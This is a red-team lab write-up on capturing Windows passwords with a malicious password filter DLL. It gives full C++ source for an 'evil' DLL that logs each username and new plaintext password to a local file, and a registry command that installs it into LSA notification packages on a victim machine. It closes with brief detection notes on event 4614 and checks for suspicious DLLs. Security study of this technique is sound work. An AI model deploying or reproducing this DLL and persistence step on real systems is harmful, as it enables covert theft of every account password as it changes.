Password Filter
Credential Access
This lab explores a native OS notification of when the user account password gets changed, which is responsible for validating it. That, of course means, that the password can be intercepted and logged.

Execution

Password filters are registered in registry and we can see them here:
1
reg query "hklm\system\currentcontrolset\control\lsa" /v "notification packages"
Copied!
Or via regedit:
Building an evil filter DLL based on a great article by mubix. He has also kindly provided the code to use, which I modified slightly to make sure that the critical DLL functions were exported correctly in order for this technique to work, since mubix's code did not work for me out of the box. I also had to change the logging statements in order to rectify a couple of compiler issues:
1
#include "stdafx.h"
2
#include <windows.h>
3
#include <stdio.h>
4
#include <WinInet.h>
5
#include <ntsecapi.h>
6
#include <stdio.h>
7
#include <iostream>
8
#include <fstream>
9
using namespace std;
10
11
void writeToLog(const char* szString)
12
{
13
FILE *pFile;
14
fopen_s(&pFile, "c:\\logFile.txt", "a+");
15
16
if (NULL == pFile)
17
{
18
return;
19
}
20
fprintf(pFile, "%s\r\n", szString);
21
fclose(pFile);
22
return;
23
24
}
25
26
extern "C" __declspec(dllexport) BOOLEAN __stdcall InitializeChangeNotify(void)
27
{
28
OutputDebugString(L"InitializeChangeNotify");
29
writeToLog("InitializeChangeNotify()");
30
return TRUE;
31
}
32
33
extern "C" __declspec(dllexport) BOOLEAN __stdcall PasswordFilter(
34
PUNICODE_STRING AccountName,
35
PUNICODE_STRING FullName,
36
PUNICODE_STRING Password,
37
BOOLEAN SetOperation)
38
{
39
OutputDebugString(L"PasswordFilter");
40
return TRUE;
41
}
42
43
extern "C" __declspec(dllexport) NTSTATUS __stdcall PasswordChangeNotify(
44
PUNICODE_STRING UserName,
45
ULONG RelativeId,
46
PUNICODE_STRING NewPassword)
47
{
48
FILE *pFile;
49
fopen_s(&pFile, "c:\\logFile.txt", "a+");
50
51
OutputDebugString(L"PasswordChangeNotify");
52
if (NULL == pFile)
53
{
54
return true;
55
}
56
fprintf(pFile, "%ws:%ws\r\n", UserName->Buffer, NewPassword->Buffer);
57
fclose(pFile);
58
return 0;
59
}
Copied!
evilpwfilter.dll
59KB
Binary
Password Filter DLL
Injecting the evil password filter into the victim system:
1
reg add "hklm\system\currentcontrolset\control\lsa" /v "notification packages" /d scecli\0evilpwfilter /t reg_multi_sz
2
3
Value notification packages exists, overwrite(Yes/No)? yes
4
The operation completed successfully.
Copied!
Testing password changes after the reboot - note how the password changes are getting logged:

Observations

Windows event 4614 notifies about new packages loaded by the SAM:
Logging command line can also help in detecting this activity:
...especially, if the package has just been recently dropped to disk:
Also, it may be worth considering checking new DLLs dropped to %systemroot%\system32 for exported PasswordChangeNotifyfunction:

References

Stealing passwords every time they change
Modify Authentication Process: Password Filter DLL, Sub-technique T1556.002 - Enterprise | MITRE ATT&CK®
Last modified 2yr ago